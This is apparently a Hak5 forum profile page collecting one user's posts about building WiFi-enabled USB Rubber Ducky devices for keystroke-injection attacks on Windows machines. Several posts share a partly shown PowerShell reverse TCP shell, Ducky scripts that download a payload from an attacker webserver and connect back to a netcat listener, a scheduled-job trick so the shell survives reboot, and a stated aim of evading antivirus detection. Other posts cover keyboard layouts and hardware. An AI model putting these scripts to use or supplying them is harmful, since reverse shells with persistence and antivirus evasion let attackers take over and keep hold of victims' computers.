
basic4

Active Members
  • Content Count: 17
  • Joined
  • Last visited

About basic4

  • Rank: Hak5 Fan


  1. Wifi Rubber Ducky with file download capability maybe?
  2. Using a Scheduled Job to make the Reverse Powershell Survive Reboot
     I've added a couple of lines to the powershell ducky script that schedules the reverse shell script to re-start after boot-up and logon by the user. This now gives us connection resilience and some degree of permanence, allowing the shell to reconnect to the server around 50 secs after a logon by our hijacked user.
     REM Opens a reverse shell back to netcat on 192.168.0.29:6673
     REM Downloads payload from a webserver on 192.168.0.29:80 (see PS_TCP4.ps1 script)
     REM MAP UK - for WifiDucky only.
     DELAY 2000
  3. Hi Zibri - Yes. You'd need to install the serial drivers via a script (powershell etc) to get full 2-way communication.
  4. illwill - Nice that download isn't required on your script. I think I'll make a hybrid to get a non-download one, but still retain error control and connection recovery. I've also found a way to survive target reboot. Tested it yesterday and it works on Win7. Still need to confirm it will work on Win10. I'll post it up later today.
  5. WATSEE: As for the keyboard layout issue (US/UK) - I think the easiest way would be to alter the bash script to pick up a locale identifier (e.g. 'MAP UK' or 'MAP US') and translate the 6-8 character differences between the two keyboard types. I had to do the same with other Arduino 'Ducky' projects I worked on. If I get time in the next few days, I'll do that and post it back here. Edit: Looks like you'd maybe be better off trying something like 'setxkbmap gb', as you'd need to change both the duckpi.sh and the C file. (I wonder why the originators wrote it that way - seems a bit limited.)
  6. Better to parameterise the destination address and port of the attacker machine in the powershell script. Makes things easier to change dynamically - if required.
     Example: ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673
     param([String]$dest, [Int32]$port);
     while (1 -eq 1) {
         $ErrorActionPreference = 'Continue';
         try {
             # attempt initial connection
             $client = New-Object System.Net.Sockets.TCPClient($dest,$port);
             $stream = $client.GetStream();
             [byte[]]$bytes = 0..255|%{0};
             $sendbytes = ([text.encoding]
  7. Hi - Are you in the UK? - If so, you need to change the key mapping when encoding your script. See international keyboards in the ducky docs. Regards, basic4.
  8. I've used the powershell script above (PSD_TCP4.ps1) in a ducky script and it works perfectly on Win7 & 10!
     Setup
     Set up my 'evil server' on a Raspberry Pi3 (webserver on port 80 and netcat listening on port 6673).
     The ducky script then runs on a windows 7/10 target:
     1. Opens powershell on the target.
     2. Downloads the reverse shell payload script.
     3. Executes it, thus forming a link back to netcat running on the Raspberry Pi3.
     Ducky script:
     REM Opens a reverse shell back to netcat on 192.168.0.17:6673
     REM Downloads payload from a webserver on 19
  9. Hi - A ducky only works if the user IS logged in AND the screen isn't locked. Using a ducky requires that the user has walked away from the target machine without locking it. Or if you can distract the user from the screen for the amount of time needed to insert the ducky and run its script. When a machine is locked, can you use the keyboard (except to log in)? - No, you need the password - which we don't know. So a Ducky is just a tool to type commands very quickly - that's all. Regards, Basic4.
  10. Reverse TCP Shell using Powershell Only
      Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/bas
  11. See the following projects I've built around the Ducky HID attack.. https://github.com/basic4/WiDucky - Wifi Ducky with windows/Python/Android controllers. https://github.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle - A basic ducky with microSD for under $10. Basic4.
  12. Hi 1. No ducky will work when a machine is locked. That's one of their limitations. 2. Yes - the WiDucky can just sit there and do nothing until you connect to it over WiFi - and send keystrokes. Basic4.
  13. It's all here https://github.com/basic4/WiDuck
  14. It's a good solution. Although I built a wifi ducky based on arduino boards and the ESP8266, since combining both gave the possibility of full speed USB and multiple end points. I built prototypes and used these until I found the 'Cactus Micro', which is a combination of a Leonardo and ESP8266. Wrote various controllers for Python, .NET and Android. Works well. Since the Atmel chip is recognized as both a HID device and a Serial port, you can (via a script) run command prompt in a windows target, and return the output of the script (via serial) to the duck and then on back to the attacker ma